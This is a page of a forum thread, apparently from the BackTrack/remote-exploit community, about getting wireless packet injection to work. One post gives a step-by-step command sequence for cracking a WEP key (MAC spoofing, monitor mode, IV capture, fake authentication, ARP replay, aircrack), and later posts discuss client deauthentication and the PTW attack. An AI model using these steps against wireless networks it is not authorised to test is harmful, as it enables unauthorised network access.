Page 2 of 2 FirstFirst 12
Results 11 to 17 of 17

Thread: Please help

  1. #11
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by bound4h View Post
    I cannot get a single card to inject, wtf.

    Can anyone help me out?

    Thanks
    You are injecting before you are associating...tisk, tisk, tisk!! thats your whole problem bound4h.

    Ill give it a try..Hope this helps ya!

    FIRST!!! PRAY TO THE BT2 GODS...this is a must for tricky cards.

    1. Boot up...and open a konsole window

    2. Type ifconfig rausb0 down (incase its not already down)

    3. type in macchanger --mac 00:11:22:33:44:55 rausb0 (00:11:22:33:44:55 is a fake mac address) then hit enter.

    4.type in airmon-ng start rausb0 4 (4 was for the channel my AP's on, so put whatever channel yours is on here) hit enter

    5. Type airodump-ng -w (FILE NAME HERE) -c (Channel of AP here) --bssid ( AP's Mac here if there are more than 1 AP on your channel to filter it) --ivs (to save only ivs) rausb0 hit enter

    6. Open another konsole window an Type aireplay-ng -1 0 -e (ESSID HERE) -a (AP mac# here)] -h [Faked mac # here] rausb0 hit enter

    7.open another konsole window and type Type aireplay-ng -3 -b (AP mac# here)] -h [Faked mac # here] rausb0 hit enter

    8. Watch your #Data till you get the comfortable # of ivs (#Data) you need to use aircrack. It might take a min or 2 but be patient!

    Hope this helps.

    PS..YOU MUST ASSOCIATE BEFORE YOU INJECT!! if you don't associate/authenticate before you inject, the AP stops listening to your injections instantly...and the rest of your injections will be ignored until you re-associate first..TRUST ME!
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  2. #12
    Junior Member
    Join Date
    May 2007
    Posts
    60

    Default

    Apologies for the posts, when yes the answers were a search away.

    However, with the research I did with the searches that I did do, I still had a hard time figuring out the commands because I am so used to the Windows environment.

    The closest I've come to Linux is BT.

    Sorry if I wasted anyone's time. There are a million things I am an expert at, but I was once a noob at ALL of them. And now I'm noobing it up, Linux-style.

    Thanks again for the responses though, I did get it working and all is good.

  3. #13
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by bound4h View Post
    Apologies for the posts, when yes the answers were a search away.
    No need to apologize...we were all n00bs at one time. Some people have more patience than others...thats all.

    Quote Originally Posted by bound4h View Post
    Thanks again for the responses though, I did get it working and all is good.
    What was the problem?? It was not associating first right?? Watch me be wrong cause now I've jinxed myself...lol
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  4. #14
    Junior Member
    Join Date
    May 2007
    Posts
    60

    Default

    First, (following a thread that I found) I airodumped, then started the arpreplay. The problem was, I was using -h and putting the TARGETCOMPUTER's MAC instead of my HW's MAC. I think the only time you use a target's MAC is when you deauth it, right?

    So, I was able to increase my AP's IVs dramatically once I got it working right.

    To answer your question, yes, I was not associated with the client because I was NOT EVEN USING the fakeauth, AND i was using MY HWMAC for the deauth.

    My problem was because when I read the --help guide for aireplay, it showed the filters and the options, but it doesnt say which one you use with which attack. So I was using the wrong modifiers with the wrong MACs.

    Anyway, I was able to download aircrack 0.9 before I started monitoring so I could use the PTW attack.

    Also, has anyone used the Ubiquiti extremerange 2? 600mW! I just bought it, it has the Atheros chipset so I would assume it will work.

    However, I bought the DLINK extreme-N ExpressCard the other day (which has the Atheros 5008 chipset) and I couldn't get it to work. I'll let you guys know what I find out.

    Thanks again guys.

  5. #15
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by bound4h View Post
    I think the only time you use a target's MAC is when you deauth it, right?
    I use the clients MAC address (the computer that is at a station on the airodump screen) durring deauth only.


    Quote Originally Posted by bound4h View Post
    To answer your question, yes, I was not associated with the client because I was NOT EVEN USING the fakeauth, AND i was using MY HWMAC for the deauth.
    Stupid question...whats a HWMAC?? Hard wired ?? Meaning you were deauthing yourself right?? ??

    Quote Originally Posted by bound4h View Post
    Thanks again guys.
    Anytime brother...anytime
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  6. #16
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by alacityathome View Post
    ok........

    And, Remote Exploit Forums will set up a new forum area called Idiot's answer corner!
    Alacrity
    I'm their "Established Leader"...lol ROTF LMAO!!!
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  7. #17
    Junior Member
    Join Date
    May 2007
    Posts
    60

    Default

    By HW i meant Hardware. Meaning MY hardware's MAC. So yes, in effect, I was deauthing myself. BUT, my thinking was: I was telling --deauth to deauth the client associated with the -b using my -h. Made sense to me

    Thanks

Page 2 of 2 FirstFirst 12

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •